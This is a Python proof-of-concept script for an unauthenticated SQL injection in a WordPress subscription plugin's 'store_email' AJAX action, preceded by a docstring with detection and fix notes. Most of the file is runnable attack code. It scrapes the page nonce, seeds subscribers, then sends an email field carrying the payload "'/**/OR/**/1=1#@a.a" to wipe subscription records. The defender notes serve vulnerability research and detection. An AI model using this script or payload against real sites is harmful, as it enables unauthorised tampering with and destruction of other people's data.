"""PoC for an unauthenticated SQL injection via the `store_email` admin-ajax
action of a WordPress email-subscription plugin (the plugin and version are
not named in this file).

Flow, as exercised by the script:
  1. GET the site root and scrape the `nonce` value that the page embeds as
     `var nonce = '<10 chars>';`. This is the only token the endpoint is
     given (`sec_string`), and it is served to an unauthenticated visitor,
     so it does not function as an access control.
  2. Create ten throw-away subscribers so a later deletion is observable.
  3. Submit one more `store_email` request whose `email` field carries SQL
     syntax; the script's stated intent is that this value reaches a query
     unescaped and removes the subscriptions created in step 2.

Defender notes: the request shape is an unauthenticated POST to
`/wp-admin/admin-ajax.php` with `action=store_email`; an `email` value that
is not a syntactically valid address (quote characters, `/**/`, `OR`, `#`)
in that parameter is the signal to alert on. On the plugin side the fix is
validating `email` and binding it as a query parameter (e.g. via
`$wpdb->prepare`) rather than relying on the page nonce.
"""

import re
import string
import random
import requests

TARGET = "http://localhost:8080"

# Endpoint that every request in this PoC goes to.
_AJAX_PATH = "/wp-admin/admin-ajax.php"

# Pattern of the nonce embedded in the landing page; exactly 10 characters
# between the quotes.
_NONCE_RE = re.compile(r'var nonce = \'(.{10})\';')


def _scrape_sec_string():
    """Return the 10-character `nonce` from the landing page, or None if absent.

    The value is fetched with a plain unauthenticated GET, which is the point
    a defender should note: the token is public, not a secret.
    """
    landing = requests.get(f"{TARGET}")
    found = _NONCE_RE.search(landing.text)
    return found.group(1) if found else None


def _store_email(form):
    """POST a single `store_email` admin-ajax request with *form* as form data.

    The response is not inspected; the original script ignores it as well.
    """
    requests.post(f"{TARGET}{_AJAX_PATH}", data=form)


def poc():
    """Run the three-step PoC against TARGET; prints progress, returns None."""
    # 1. The endpoint's only check is the page-embedded nonce.
    sec_string = _scrape_sec_string()
    if sec_string is None:
        print("[-] 'sec_string' not found")
        return
    print(f"[*] sec_string: {sec_string}")

    # 2. Seed subscribers under a random prefix so repeated runs do not collide.
    prefix = "".join(random.choices(string.ascii_letters + string.digits, k=6))
    for idx in range(10):
        subscriber = {
            "action": "store_email",
            "email": f"{prefix}_{idx}@example.com",
            "name": f"{prefix}_{idx}",
            "is_agreed": "true",
            "sec_string": sec_string,
        }
        print(
            f"[+] Successfully created subscriber #{idx} "
            f"Email: {subscriber['email']}, Name: {subscriber['name']}"
        )
        _store_email(subscriber)

    # 3. Same request shape; only the `email` field differs. Input validation
    #    on this field is what the vulnerable plugin is missing.
    injected = {
        "action": "store_email",
        "email": "'/**/OR/**/1=1#@a.a",
        "name": "Email mine",
        "is_agreed": "true",
        "sec_string": sec_string,
    }
    print(
        f"[+] Malicious email address created "
        f"Email: {injected['email']}, Name: {injected['name']}"
    )
    _store_email(injected)


if __name__ == "__main__":
    poc()